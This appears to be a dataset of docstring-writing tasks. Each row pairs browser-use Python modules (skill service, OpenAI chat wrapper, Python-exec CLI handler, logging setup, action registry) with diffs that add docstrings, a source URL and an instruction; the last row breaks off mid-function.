self, skill_id: str, parameters: dict[str, Any] | BaseModel, cookies: list[Cookie]
) -> ExecuteSkillResponse:
# Auto-initialize if needed
if not self._initialized:
await self.async_init()
assert self._client is not None, 'Client not initialized'
# Check if skill exists in cache
skill = await self.get_skill(skill_id)
if skill is None:
raise ValueError(f'Skill {skill_id} not found in cache. Available skills: {list(self._skills.keys())}')
# Extract cookie parameters from the skill
cookie_params = [p for p in skill.parameters if p.type == 'cookie']
# Build a dict of cookies from the provided cookie list
cookie_dict: dict[str, str] = {cookie['name']: cookie['value'] for cookie in cookies}
# Check for missing required cookies and fill cookie values
if cookie_params:
for cookie_param in cookie_params:
is_required = cookie_param.required if cookie_param.required is not None else True
if is_required and cookie_param.name not in cookie_dict:
# Required cookie is missing - raise exception with description
raise MissingCookieException(
cookie_name=cookie_param.name, cookie_description=cookie_param.description or 'No description provided'
)
# Fill in cookie values into parameters
# Convert parameters to dict first if it's a BaseModel
if isinstance(parameters, BaseModel):
params_dict = parameters.model_dump()
else:
params_dict = dict(parameters)
# Add cookie values to parameters
for cookie_param in cookie_params:
if cookie_param.name in cookie_dict:
params_dict[cookie_param.name] = cookie_dict[cookie_param.name]
# Replace parameters with the updated dict
parameters = params_dict
# Get the skill's pydantic model for parameter validation
ParameterModel = skill.parameters_pydantic(exclude_cookies=False)
# Validate and convert parameters to dict
validated_params_dict: dict[str, Any]
try:
if isinstance(parameters, BaseModel):
# Already a pydantic model - validate it matches the skill's schema
# by converting to dict and re-validating with the skill's model
params_dict = parameters.model_dump()
validated_model = ParameterModel(**params_dict)
validated_params_dict = validated_model.model_dump()
else:
# Dict provided - validate with the skill's pydantic model
validated_model = ParameterModel(**parameters)
validated_params_dict = validated_model.model_dump()
except ValidationError as e:
# Pydantic validation failed
error_msg = f'Parameter validation failed for skill {skill.title}:\n'
for error in e.errors():
field = '.'.join(str(x) for x in error['loc'])
error_msg += f' - {field}: {error["msg"]}\n'
raise ValueError(error_msg) from e
except Exception as e:
raise ValueError(f'Failed to validate parameters for skill {skill.title}: {type(e).__name__}: {e}') from e
# Execute skill via API
try:
logger.info(f'Executing skill: {skill.title} ({skill_id})')
result: ExecuteSkillResponse = await self._client.skills.execute_skill(
skill_id=skill_id, parameters=validated_params_dict
)
if result.success:
logger.info(f'Skill {skill.title} executed successfully (latency: {result.latency_ms}ms)')
else:
logger.error(f'Skill {skill.title} execution failed: {result.error}')
return result
except Exception as e:
logger.error(f'Error executing skill {skill_id}: {type(e).__name__}: {e}')
# Return error response
return ExecuteSkillResponse(
success=False,
error=f'Failed to execute skill: {type(e).__name__}: {str(e)}',
)
async def close(self) -> None:
if self._client is not None:
# AsyncBrowserUse client cleanup if needed
# The SDK doesn't currently have a close method, but we set to None for cleanup
self._client = None
self._initialized = False | --- +++ @@ -1,3 +1,4 @@+"""Skills service for fetching and executing skills from the Browser Use API"""
import logging
import os
@@ -18,8 +19,15 @@
class SkillService:
+ """Service for managing and executing skills from the Browser Use API"""
def __init__(self, skill_ids: list[str | Literal['*']], api_key: str | None = None):
+ """Initialize the skills service
+
+ Args:
+ skill_ids: List of skill IDs to fetch and cache, or ['*'] to fetch all available skills
+ api_key: Browser Use API key (optional, will use env var if not provided)
+ """
self.skill_ids = skill_ids
self.api_key = api_key or os.getenv('BROWSER_USE_API_KEY') or ''
@@ -31,6 +39,11 @@ self._initialized = False
async def async_init(self) -> None:
+ """Async initialization to fetch all skills at once
+
+ This should be called after __init__ to fetch and cache all skills.
+ Fetches all available skills in one API call and filters based on skill_ids.
+ """
if self._initialized:
logger.debug('SkillService already initialized')
return
@@ -127,12 +140,25 @@ raise
async def get_skill(self, skill_id: str) -> Skill | None:
+ """Get a cached skill by ID. Auto-initializes if not already initialized.
+
+ Args:
+ skill_id: The UUID of the skill
+
+ Returns:
+ Skill model or None if not found in cache
+ """
if not self._initialized:
await self.async_init()
return self._skills.get(skill_id)
async def get_all_skills(self) -> list[Skill]:
+ """Get all cached skills. Auto-initializes if not already initialized.
+
+ Returns:
+ List of all successfully loaded skills
+ """
if not self._initialized:
await self.async_init()
@@ -141,6 +167,21 @@ async def execute_skill(
self, skill_id: str, parameters: dict[str, Any] | BaseModel, cookies: list[Cookie]
) -> ExecuteSkillResponse:
+ """Execute a skill with the provided parameters. Auto-initializes if not already initialized.
+
+ Parameters are validated against the skill's Pydantic schema before execution.
+
+ Args:
+ skill_id: The UUID of the skill to execute
+ parameters: Either a dictionary or BaseModel instance matching the skill's parameter schema
+
+ Returns:
+ ExecuteSkillResponse with execution results
+
+ Raises:
+ ValueError: If skill not found in cache or parameter validation fails
+ Exception: If API call fails
+ """
# Auto-initialize if needed
if not self._initialized:
await self.async_init()
@@ -235,8 +276,9 @@ )
async def close(self) -> None:
+ """Close the SDK client and cleanup resources"""
if self._client is not None:
# AsyncBrowserUse client cleanup if needed
# The SDK doesn't currently have a close method, but we set to None for cleanup
self._client = None
- self._initialized = False+ self._initialized = False
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skills/service.py |
Document this code for team use | from collections.abc import Iterable, Mapping
from dataclasses import dataclass, field
from typing import Any, Literal, TypeVar, overload
import httpx
from openai import APIConnectionError, APIStatusError, AsyncOpenAI, RateLimitError
from openai.types.chat import ChatCompletionContentPartTextParam
from openai.types.chat.chat_completion import ChatCompletion
from openai.types.shared.chat_model import ChatModel
from openai.types.shared_params.reasoning_effort import ReasoningEffort
from openai.types.shared_params.response_format_json_schema import JSONSchema, ResponseFormatJSONSchema
from pydantic import BaseModel
from browser_use.llm.base import BaseChatModel
from browser_use.llm.exceptions import ModelProviderError, ModelRateLimitError
from browser_use.llm.messages import BaseMessage
from browser_use.llm.openai.serializer import OpenAIMessageSerializer
from browser_use.llm.schema import SchemaOptimizer
from browser_use.llm.views import ChatInvokeCompletion, ChatInvokeUsage
T = TypeVar('T', bound=BaseModel)
@dataclass
class ChatOpenAI(BaseChatModel):
# Model configuration
model: ChatModel | str
# Model params
temperature: float | None = 0.2
frequency_penalty: float | None = 0.3 # this avoids infinite generation of \t for models like 4.1-mini
reasoning_effort: ReasoningEffort = 'low'
seed: int | None = None
service_tier: Literal['auto', 'default', 'flex', 'priority', 'scale'] | None = None
top_p: float | None = None
add_schema_to_system_prompt: bool = False # Add JSON schema to system prompt instead of using response_format
dont_force_structured_output: bool = False # If True, the model will not be forced to output a structured output
remove_min_items_from_schema: bool = (
False # If True, remove minItems from JSON schema (for compatibility with some providers)
)
remove_defaults_from_schema: bool = (
False # If True, remove default values from JSON schema (for compatibility with some providers)
)
# Client initialization parameters
api_key: str | None = None
organization: str | None = None
project: str | None = None
base_url: str | httpx.URL | None = None
websocket_base_url: str | httpx.URL | None = None
timeout: float | httpx.Timeout | None = None
max_retries: int = 5 # Increase default retries for automation reliability
default_headers: Mapping[str, str] | None = None
default_query: Mapping[str, object] | None = None
http_client: httpx.AsyncClient | None = None
_strict_response_validation: bool = False
max_completion_tokens: int | None = 4096
reasoning_models: list[ChatModel | str] | None = field(
default_factory=lambda: [
'o4-mini',
'o3',
'o3-mini',
'o1',
'o1-pro',
'o3-pro',
'gpt-5',
'gpt-5-mini',
'gpt-5-nano',
]
)
# Static
@property
def provider(self) -> str:
return 'openai'
def _get_client_params(self) -> dict[str, Any]:
# Define base client params
base_params = {
'api_key': self.api_key,
'organization': self.organization,
'project': self.project,
'base_url': self.base_url,
'websocket_base_url': self.websocket_base_url,
'timeout': self.timeout,
'max_retries': self.max_retries,
'default_headers': self.default_headers,
'default_query': self.default_query,
'_strict_response_validation': self._strict_response_validation,
}
# Create client_params dict with non-None values
client_params = {k: v for k, v in base_params.items() if v is not None}
# Add http_client if provided
if self.http_client is not None:
client_params['http_client'] = self.http_client
return client_params
def get_client(self) -> AsyncOpenAI:
client_params = self._get_client_params()
return AsyncOpenAI(**client_params)
@property
def name(self) -> str:
return str(self.model)
def _get_usage(self, response: ChatCompletion) -> ChatInvokeUsage | None:
if response.usage is not None:
# Note: completion_tokens already includes reasoning_tokens per OpenAI API docs.
# Unlike Google Gemini where thinking_tokens are reported separately,
# OpenAI's reasoning_tokens are a subset of completion_tokens.
usage = ChatInvokeUsage(
prompt_tokens=response.usage.prompt_tokens,
prompt_cached_tokens=response.usage.prompt_tokens_details.cached_tokens
if response.usage.prompt_tokens_details is not None
else None,
prompt_cache_creation_tokens=None,
prompt_image_tokens=None,
# Completion
completion_tokens=response.usage.completion_tokens,
total_tokens=response.usage.total_tokens,
)
else:
usage = None
return usage
@overload
async def ainvoke(
self, messages: list[BaseMessage], output_format: None = None, **kwargs: Any
) -> ChatInvokeCompletion[str]: ...
@overload
async def ainvoke(self, messages: list[BaseMessage], output_format: type[T], **kwargs: Any) -> ChatInvokeCompletion[T]: ...
async def ainvoke(
self, messages: list[BaseMessage], output_format: type[T] | None = None, **kwargs: Any
) -> ChatInvokeCompletion[T] | ChatInvokeCompletion[str]:
openai_messages = OpenAIMessageSerializer.serialize_messages(messages)
try:
model_params: dict[str, Any] = {}
if self.temperature is not None:
model_params['temperature'] = self.temperature
if self.frequency_penalty is not None:
model_params['frequency_penalty'] = self.frequency_penalty
if self.max_completion_tokens is not None:
model_params['max_completion_tokens'] = self.max_completion_tokens
if self.top_p is not None:
model_params['top_p'] = self.top_p
if self.seed is not None:
model_params['seed'] = self.seed
if self.service_tier is not None:
model_params['service_tier'] = self.service_tier
if self.reasoning_models and any(str(m).lower() in str(self.model).lower() for m in self.reasoning_models):
model_params['reasoning_effort'] = self.reasoning_effort
model_params.pop('temperature', None)
model_params.pop('frequency_penalty', None)
if output_format is None:
# Return string response
response = await self.get_client().chat.completions.create(
model=self.model,
messages=openai_messages,
**model_params,
)
choice = response.choices[0] if response.choices else None
if choice is None:
base_url = str(self.base_url) if self.base_url is not None else None
hint = f' (base_url={base_url})' if base_url is not None else ''
raise ModelProviderError(
message=(
'Invalid OpenAI chat completion response: missing or empty `choices`.'
' If you are using a proxy via `base_url`, ensure it implements the OpenAI'
' `/v1/chat/completions` schema and returns `choices` as a non-empty list.'
f'{hint}'
),
status_code=502,
model=self.name,
)
usage = self._get_usage(response)
return ChatInvokeCompletion(
completion=choice.message.content or '',
usage=usage,
stop_reason=choice.finish_reason,
)
else:
response_format: JSONSchema = {
'name': 'agent_output',
'strict': True,
'schema': SchemaOptimizer.create_optimized_json_schema(
output_format,
remove_min_items=self.remove_min_items_from_schema,
remove_defaults=self.remove_defaults_from_schema,
),
}
# Add JSON schema to system prompt if requested
if self.add_schema_to_system_prompt and openai_messages and openai_messages[0]['role'] == 'system':
schema_text = f'\n<json_schema>\n{response_format}\n</json_schema>'
if isinstance(openai_messages[0]['content'], str):
openai_messages[0]['content'] += schema_text
elif isinstance(openai_messages[0]['content'], Iterable):
openai_messages[0]['content'] = list(openai_messages[0]['content']) + [
ChatCompletionContentPartTextParam(text=schema_text, type='text')
]
if self.dont_force_structured_output:
response = await self.get_client().chat.completions.create(
model=self.model,
messages=openai_messages,
**model_params,
)
else:
# Return structured response
response = await self.get_client().chat.completions.create(
model=self.model,
messages=openai_messages,
response_format=ResponseFormatJSONSchema(json_schema=response_format, type='json_schema'),
**model_params,
)
choice = response.choices[0] if response.choices else None
if choice is None:
base_url = str(self.base_url) if self.base_url is not None else None
hint = f' (base_url={base_url})' if base_url is not None else ''
raise ModelProviderError(
message=(
'Invalid OpenAI chat completion response: missing or empty `choices`.'
' If you are using a proxy via `base_url`, ensure it implements the OpenAI'
' `/v1/chat/completions` schema and returns `choices` as a non-empty list.'
f'{hint}'
),
status_code=502,
model=self.name,
)
if choice.message.content is None:
raise ModelProviderError(
message='Failed to parse structured output from model response',
status_code=500,
model=self.name,
)
usage = self._get_usage(response)
parsed = output_format.model_validate_json(choice.message.content)
return ChatInvokeCompletion(
completion=parsed,
usage=usage,
stop_reason=choice.finish_reason,
)
except ModelProviderError:
# Preserve status_code and message from validation errors
raise
except RateLimitError as e:
raise ModelRateLimitError(message=e.message, model=self.name) from e
except APIConnectionError as e:
raise ModelProviderError(message=str(e), model=self.name) from e
except APIStatusError as e:
raise ModelProviderError(message=e.message, status_code=e.status_code, model=self.name) from e
except Exception as e:
raise ModelProviderError(message=str(e), model=self.name) from e | --- +++ @@ -23,6 +23,12 @@
@dataclass
class ChatOpenAI(BaseChatModel):
+ """
+ A wrapper around AsyncOpenAI that implements the BaseLLM protocol.
+
+ This class accepts all AsyncOpenAI parameters while adding model
+ and temperature parameters for the LLM interface (if temperature it not `None`).
+ """
# Model configuration
model: ChatModel | str
@@ -76,6 +82,7 @@ return 'openai'
def _get_client_params(self) -> dict[str, Any]:
+ """Prepare client parameters dictionary."""
# Define base client params
base_params = {
'api_key': self.api_key,
@@ -100,6 +107,12 @@ return client_params
def get_client(self) -> AsyncOpenAI:
+ """
+ Returns an AsyncOpenAI client.
+
+ Returns:
+ AsyncOpenAI: An instance of the AsyncOpenAI client.
+ """
client_params = self._get_client_params()
return AsyncOpenAI(**client_params)
@@ -139,6 +152,16 @@ async def ainvoke(
self, messages: list[BaseMessage], output_format: type[T] | None = None, **kwargs: Any
) -> ChatInvokeCompletion[T] | ChatInvokeCompletion[str]:
+ """
+ Invoke the model with the given messages.
+
+ Args:
+ messages: List of chat messages
+ output_format: Optional Pydantic model class for structured output
+
+ Returns:
+ Either a string response or an instance of output_format
+ """
openai_messages = OpenAIMessageSerializer.serialize_messages(messages)
@@ -280,4 +303,4 @@ raise ModelProviderError(message=e.message, status_code=e.status_code, model=self.name) from e
except Exception as e:
- raise ModelProviderError(message=str(e), model=self.name) from e+ raise ModelProviderError(message=str(e), model=self.name) from e
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/openai/chat.py |
Add professional docstrings to my codebase |
import asyncio
import logging
from pathlib import Path
from typing import Any
from browser_use.skill_cli.sessions import SessionInfo
logger = logging.getLogger(__name__)
async def handle(session: SessionInfo, params: dict[str, Any]) -> Any:
python_session = session.python_session
browser_session = session.browser_session
# Handle --reset
if params.get('reset'):
python_session.reset()
return {'reset': True, 'message': 'Python namespace cleared'}
# Handle --vars
if params.get('vars'):
variables = python_session.get_variables()
return {'variables': variables, 'count': len(variables)}
# Get code to execute
code = params.get('code')
# Handle --file
if params.get('file'):
file_path = Path(params['file'])
if not file_path.exists():
return {'success': False, 'error': f'File not found: {file_path}'}
if file_path.is_dir():
return {'success': False, 'error': f'Path is a directory, not a file: {file_path}'}
code = file_path.read_text()
if not code:
return {'success': False, 'error': 'No code provided. Use: python "<code>" or --file script.py'}
# Execute code in a thread pool so browser operations can schedule back to the event loop
loop = asyncio.get_running_loop()
result = await loop.run_in_executor(None, python_session.execute, code, browser_session, loop)
if result.success:
# Return raw text output for clean display
return {'_raw_text': result.output} if result.output else {}
else:
return {'error': result.error or 'Unknown error'} | --- +++ @@ -1,3 +1,4 @@+"""Python execution command handler."""
import asyncio
import logging
@@ -10,6 +11,14 @@
async def handle(session: SessionInfo, params: dict[str, Any]) -> Any:
+ """Handle python command.
+
+ Supports:
+ - python "<code>" - Execute Python code
+ - python --file script.py - Execute Python file
+ - python --reset - Reset namespace
+ - python --vars - Show defined variables
+ """
python_session = session.python_session
browser_session = session.browser_session
@@ -46,4 +55,4 @@ # Return raw text output for clean display
return {'_raw_text': result.output} if result.output else {}
else:
- return {'error': result.error or 'Unknown error'}+ return {'error': result.error or 'Unknown error'}
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/python_exec.py |
Write Python docstrings for this snippet | import logging
import os
import sys
from pathlib import Path
from dotenv import load_dotenv
load_dotenv()
from browser_use.config import CONFIG
def addLoggingLevel(levelName, levelNum, methodName=None):
if not methodName:
methodName = levelName.lower()
if hasattr(logging, levelName):
raise AttributeError(f'{levelName} already defined in logging module')
if hasattr(logging, methodName):
raise AttributeError(f'{methodName} already defined in logging module')
if hasattr(logging.getLoggerClass(), methodName):
raise AttributeError(f'{methodName} already defined in logger class')
# This method was inspired by the answers to Stack Overflow post
# http://stackoverflow.com/q/2183233/2988730, especially
# http://stackoverflow.com/a/13638084/2988730
def logForLevel(self, message, *args, **kwargs):
if self.isEnabledFor(levelNum):
self._log(levelNum, message, args, **kwargs)
def logToRoot(message, *args, **kwargs):
logging.log(levelNum, message, *args, **kwargs)
logging.addLevelName(levelNum, levelName)
setattr(logging, levelName, levelNum)
setattr(logging.getLoggerClass(), methodName, logForLevel)
setattr(logging, methodName, logToRoot)
def setup_logging(stream=None, log_level=None, force_setup=False, debug_log_file=None, info_log_file=None):
# Try to add RESULT level, but ignore if it already exists
try:
addLoggingLevel('RESULT', 35) # This allows ERROR, FATAL and CRITICAL
except AttributeError:
pass # Level already exists, which is fine
log_type = log_level or CONFIG.BROWSER_USE_LOGGING_LEVEL
# Check if handlers are already set up
if logging.getLogger().hasHandlers() and not force_setup:
return logging.getLogger('browser_use')
# Clear existing handlers
root = logging.getLogger()
root.handlers = []
class BrowserUseFormatter(logging.Formatter):
def __init__(self, fmt, log_level):
super().__init__(fmt)
self.log_level = log_level
def format(self, record):
# Only clean up names in INFO mode, keep everything in DEBUG mode
if self.log_level > logging.DEBUG and isinstance(record.name, str) and record.name.startswith('browser_use.'):
# Extract clean component names from logger names
if 'Agent' in record.name:
record.name = 'Agent'
elif 'BrowserSession' in record.name:
record.name = 'BrowserSession'
elif 'tools' in record.name:
record.name = 'tools'
elif 'dom' in record.name:
record.name = 'dom'
elif record.name.startswith('browser_use.'):
# For other browser_use modules, use the last part
parts = record.name.split('.')
if len(parts) >= 2:
record.name = parts[-1]
return super().format(record)
# Setup single handler for all loggers
console = logging.StreamHandler(stream or sys.stderr)
# Determine the log level to use first
if log_type == 'result':
log_level = 35 # RESULT level value
elif log_type == 'debug':
log_level = logging.DEBUG
else:
log_level = logging.INFO
# adittional setLevel here to filter logs
if log_type == 'result':
console.setLevel('RESULT')
console.setFormatter(BrowserUseFormatter('%(message)s', log_level))
else:
console.setLevel(log_level) # Keep console at original log level (e.g., INFO)
console.setFormatter(BrowserUseFormatter('%(levelname)-8s [%(name)s] %(message)s', log_level))
# Configure root logger only
root.addHandler(console)
# Add file handlers if specified
file_handlers = []
# Create debug log file handler
if debug_log_file:
debug_handler = logging.FileHandler(debug_log_file, encoding='utf-8')
debug_handler.setLevel(logging.DEBUG)
debug_handler.setFormatter(BrowserUseFormatter('%(asctime)s - %(levelname)-8s [%(name)s] %(message)s', logging.DEBUG))
file_handlers.append(debug_handler)
root.addHandler(debug_handler)
# Create info log file handler
if info_log_file:
info_handler = logging.FileHandler(info_log_file, encoding='utf-8')
info_handler.setLevel(logging.INFO)
info_handler.setFormatter(BrowserUseFormatter('%(asctime)s - %(levelname)-8s [%(name)s] %(message)s', logging.INFO))
file_handlers.append(info_handler)
root.addHandler(info_handler)
# Configure root logger - use DEBUG if debug file logging is enabled
effective_log_level = logging.DEBUG if debug_log_file else log_level
root.setLevel(effective_log_level)
# Configure browser_use logger
browser_use_logger = logging.getLogger('browser_use')
browser_use_logger.propagate = False # Don't propagate to root logger
browser_use_logger.addHandler(console)
for handler in file_handlers:
browser_use_logger.addHandler(handler)
browser_use_logger.setLevel(effective_log_level)
# Configure bubus logger to allow INFO level logs
bubus_logger = logging.getLogger('bubus')
bubus_logger.propagate = False # Don't propagate to root logger
bubus_logger.addHandler(console)
for handler in file_handlers:
bubus_logger.addHandler(handler)
bubus_logger.setLevel(logging.INFO if log_type == 'result' else effective_log_level)
# Configure CDP logging using cdp_use's setup function
# This enables the formatted CDP output using CDP_LOGGING_LEVEL environment variable
# Convert CDP_LOGGING_LEVEL string to logging level
cdp_level_str = CONFIG.CDP_LOGGING_LEVEL.upper()
cdp_level = getattr(logging, cdp_level_str, logging.WARNING)
try:
from cdp_use.logging import setup_cdp_logging # type: ignore
# Use the CDP-specific logging level
setup_cdp_logging(
level=cdp_level,
stream=stream or sys.stderr,
format_string='%(levelname)-8s [%(name)s] %(message)s' if log_type != 'result' else '%(message)s',
)
except ImportError:
# If cdp_use doesn't have the new logging module, fall back to manual config
cdp_loggers = [
'websockets.client',
'cdp_use',
'cdp_use.client',
'cdp_use.cdp',
'cdp_use.cdp.registry',
]
for logger_name in cdp_loggers:
cdp_logger = logging.getLogger(logger_name)
cdp_logger.setLevel(cdp_level)
cdp_logger.addHandler(console)
cdp_logger.propagate = False
logger = logging.getLogger('browser_use')
# logger.debug('BrowserUse logging setup complete with level %s', log_type)
# Silence third-party loggers (but not CDP ones which we configured above)
third_party_loggers = [
'WDM',
'httpx',
'selenium',
'playwright',
'urllib3',
'asyncio',
'langsmith',
'langsmith.client',
'openai',
'httpcore',
'charset_normalizer',
'anthropic._base_client',
'PIL.PngImagePlugin',
'trafilatura.htmlprocessing',
'trafilatura',
'groq',
'portalocker',
'google_genai',
'portalocker.utils',
'websockets', # General websockets (but not websockets.client which we need)
]
for logger_name in third_party_loggers:
third_party = logging.getLogger(logger_name)
third_party.setLevel(logging.ERROR)
third_party.propagate = False
return logger
class FIFOHandler(logging.Handler):
def __init__(self, fifo_path: str):
super().__init__()
self.fifo_path = fifo_path
Path(fifo_path).parent.mkdir(parents=True, exist_ok=True)
# Create FIFO if it doesn't exist
if not os.path.exists(fifo_path):
os.mkfifo(fifo_path)
# Don't open the FIFO yet - will open on first write
self.fd = None
def emit(self, record):
try:
# Open FIFO on first write if not already open
if self.fd is None:
try:
self.fd = os.open(self.fifo_path, os.O_WRONLY | os.O_NONBLOCK)
except OSError:
# No reader connected yet, skip this message
return
msg = f'{self.format(record)}\n'.encode()
os.write(self.fd, msg)
except (OSError, BrokenPipeError):
# Reader disconnected, close and reset
if self.fd is not None:
try:
os.close(self.fd)
except Exception:
pass
self.fd = None
def close(self):
if hasattr(self, 'fd') and self.fd is not None:
try:
os.close(self.fd)
except Exception:
pass
super().close()
def setup_log_pipes(session_id: str, base_dir: str | None = None):
import tempfile
if base_dir is None:
base_dir = tempfile.gettempdir()
suffix = session_id[-4:]
pipe_dir = Path(base_dir) / f'buagent.{suffix}'
# Agent logs
agent_handler = FIFOHandler(str(pipe_dir / 'agent.pipe'))
agent_handler.setLevel(logging.DEBUG)
agent_handler.setFormatter(logging.Formatter('%(levelname)-8s [%(name)s] %(message)s'))
for name in ['browser_use.agent', 'browser_use.tools']:
logger = logging.getLogger(name)
logger.addHandler(agent_handler)
logger.setLevel(logging.DEBUG)
logger.propagate = True
# CDP logs
cdp_handler = FIFOHandler(str(pipe_dir / 'cdp.pipe'))
cdp_handler.setLevel(logging.DEBUG)
cdp_handler.setFormatter(logging.Formatter('%(levelname)-8s [%(name)s] %(message)s'))
for name in ['websockets.client', 'cdp_use.client']:
logger = logging.getLogger(name)
logger.addHandler(cdp_handler)
logger.setLevel(logging.DEBUG)
logger.propagate = True
# Event logs
event_handler = FIFOHandler(str(pipe_dir / 'events.pipe'))
event_handler.setLevel(logging.INFO)
event_handler.setFormatter(logging.Formatter('%(levelname)-8s [%(name)s] %(message)s'))
for name in ['bubus', 'browser_use.browser.session']:
logger = logging.getLogger(name)
logger.addHandler(event_handler)
logger.setLevel(logging.INFO) # Enable INFO for event bus
logger.propagate = True | --- +++ @@ -11,6 +11,30 @@
def addLoggingLevel(levelName, levelNum, methodName=None):
+ """
+ Comprehensively adds a new logging level to the `logging` module and the
+ currently configured logging class.
+
+ `levelName` becomes an attribute of the `logging` module with the value
+ `levelNum`. `methodName` becomes a convenience method for both `logging`
+ itself and the class returned by `logging.getLoggerClass()` (usually just
+ `logging.Logger`). If `methodName` is not specified, `levelName.lower()` is
+ used.
+
+ To avoid accidental clobberings of existing attributes, this method will
+ raise an `AttributeError` if the level name is already an attribute of the
+ `logging` module or if the method name is already present
+
+ Example
+ -------
+ >>> addLoggingLevel('TRACE', logging.DEBUG - 5)
+ >>> logging.getLogger(__name__).setLevel('TRACE')
+ >>> logging.getLogger(__name__).trace('that worked')
+ >>> logging.trace('so did this')
+ >>> logging.TRACE
+ 5
+
+ """
if not methodName:
methodName = levelName.lower()
@@ -38,6 +62,15 @@
def setup_logging(stream=None, log_level=None, force_setup=False, debug_log_file=None, info_log_file=None):
+ """Setup logging configuration for browser-use.
+
+ Args:
+ stream: Output stream for logs (default: sys.stdout). Can be sys.stderr for MCP mode.
+ log_level: Override log level (default: uses CONFIG.BROWSER_USE_LOGGING_LEVEL)
+ force_setup: Force reconfiguration even if handlers already exist
+ debug_log_file: Path to log file for debug level logs only
+ info_log_file: Path to log file for info level logs only
+ """
# Try to add RESULT level, but ignore if it already exists
try:
addLoggingLevel('RESULT', 35) # This allows ERROR, FATAL and CRITICAL
@@ -204,6 +237,7 @@
class FIFOHandler(logging.Handler):
+ """Non-blocking handler that writes to a named pipe."""
def __init__(self, fifo_path: str):
super().__init__()
@@ -248,6 +282,15 @@
def setup_log_pipes(session_id: str, base_dir: str | None = None):
+ """Setup named pipes for log streaming.
+
+ Usage:
+ # In browser-use:
+ setup_log_pipes(session_id="abc123")
+
+ # In consumer process:
+ tail -f {temp_dir}/buagent.c123/agent.pipe
+ """
import tempfile
if base_dir is None:
@@ -284,4 +327,4 @@ logger = logging.getLogger(name)
logger.addHandler(event_handler)
logger.setLevel(logging.INFO) # Enable INFO for event bus
- logger.propagate = True+ logger.propagate = True
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/logging_config.py |
Create docstrings for each class method | import asyncio
import functools
import inspect
import logging
import re
from collections.abc import Callable
from inspect import Parameter, iscoroutinefunction, signature
from types import UnionType
from typing import Any, Generic, Optional, TypeVar, Union, get_args, get_origin
import pyotp
from pydantic import BaseModel, Field, RootModel, create_model
from browser_use.browser import BrowserSession
from browser_use.filesystem.file_system import FileSystem
from browser_use.llm.base import BaseChatModel
from browser_use.observability import observe_debug
from browser_use.telemetry.service import ProductTelemetry
from browser_use.tools.registry.views import (
ActionModel,
ActionRegistry,
RegisteredAction,
SpecialActionParameters,
)
from browser_use.utils import is_new_tab_page, match_url_with_domain_pattern, time_execution_async
Context = TypeVar('Context')
logger = logging.getLogger(__name__)
class Registry(Generic[Context]):
def __init__(self, exclude_actions: list[str] | None = None):
self.registry = ActionRegistry()
self.telemetry = ProductTelemetry()
# Create a new list to avoid mutable default argument issues
self.exclude_actions = list(exclude_actions) if exclude_actions is not None else []
def exclude_action(self, action_name: str) -> None:
# Add to exclude list to prevent future registration
if action_name not in self.exclude_actions:
self.exclude_actions.append(action_name)
# Remove from registry if already registered
if action_name in self.registry.actions:
del self.registry.actions[action_name]
logger.debug(f'Excluded action "{action_name}" from registry')
def _get_special_param_types(self) -> dict[str, type | UnionType | None]:
# Manually define the expected types to avoid issues with Optional handling.
# we should try to reduce this list to 0 if possible, give as few standardized objects to all the actions
# but each driver should decide what is relevant to expose the action methods,
# e.g. CDP client, 2fa code getters, sensitive_data wrappers, other context, etc.
return {
'context': None, # Context is a TypeVar, so we can't validate type
'browser_session': BrowserSession,
'page_url': str,
'cdp_client': None, # CDPClient type from cdp_use, but we don't import it here
'page_extraction_llm': BaseChatModel,
'available_file_paths': list,
'has_sensitive_data': bool,
'file_system': FileSystem,
'extraction_schema': None, # dict | None, skip type validation
}
def _normalize_action_function_signature(
self,
func: Callable,
description: str,
param_model: type[BaseModel] | None = None,
) -> tuple[Callable, type[BaseModel]]:
sig = signature(func)
parameters = list(sig.parameters.values())
special_param_types = self._get_special_param_types()
special_param_names = set(special_param_types.keys())
# Step 1: Validate no **kwargs in original function signature
# if it needs default values it must use a dedicated param_model: BaseModel instead
for param in parameters:
if param.kind == Parameter.VAR_KEYWORD:
raise ValueError(
f"Action '{func.__name__}' has **{param.name} which is not allowed. "
f'Actions must have explicit positional parameters only.'
)
# Step 2: Separate special and action parameters
action_params = []
special_params = []
param_model_provided = param_model is not None
for i, param in enumerate(parameters):
# Check if this is a Type 1 pattern (first param is BaseModel)
if i == 0 and param_model_provided and param.name not in special_param_names:
# This is Type 1 pattern - skip the params argument
continue
if param.name in special_param_names:
# Validate special parameter type
expected_type = special_param_types.get(param.name)
if param.annotation != Parameter.empty and expected_type is not None:
# Handle Optional types - normalize both sides
param_type = param.annotation
origin = get_origin(param_type)
if origin is Union:
args = get_args(param_type)
# Find non-None type
param_type = next((arg for arg in args if arg is not type(None)), param_type)
# Check if types are compatible (exact match, subclass, or generic list)
types_compatible = (
param_type == expected_type
or (
inspect.isclass(param_type)
and inspect.isclass(expected_type)
and issubclass(param_type, expected_type)
)
or
# Handle list[T] vs list comparison
(expected_type is list and (param_type is list or get_origin(param_type) is list))
)
if not types_compatible:
expected_type_name = getattr(expected_type, '__name__', str(expected_type))
param_type_name = getattr(param_type, '__name__', str(param_type))
raise ValueError(
f"Action '{func.__name__}' parameter '{param.name}: {param_type_name}' "
f"conflicts with special argument injected by tools: '{param.name}: {expected_type_name}'"
)
special_params.append(param)
else:
action_params.append(param)
# Step 3: Create or validate param model
if not param_model_provided:
# Type 2: Generate param model from action params
if action_params:
params_dict = {}
for param in action_params:
annotation = param.annotation if param.annotation != Parameter.empty else str
default = ... if param.default == Parameter.empty else param.default
params_dict[param.name] = (annotation, default)
param_model = create_model(f'{func.__name__}_Params', __base__=ActionModel, **params_dict)
else:
# No action params, create empty model
param_model = create_model(
f'{func.__name__}_Params',
__base__=ActionModel,
)
assert param_model is not None, f'param_model is None for {func.__name__}'
# Step 4: Create normalized wrapper function
@functools.wraps(func)
async def normalized_wrapper(*args, params: BaseModel | None = None, **kwargs):
# Validate no positional args
if args:
raise TypeError(f'{func.__name__}() does not accept positional arguments, only keyword arguments are allowed')
# Prepare arguments for original function
call_args = []
call_kwargs = {}
# Handle Type 1 pattern (first arg is the param model)
if param_model_provided and parameters and parameters[0].name not in special_param_names:
if params is None:
raise ValueError(f"{func.__name__}() missing required 'params' argument")
# For Type 1, we'll use the params object as first argument
pass
else:
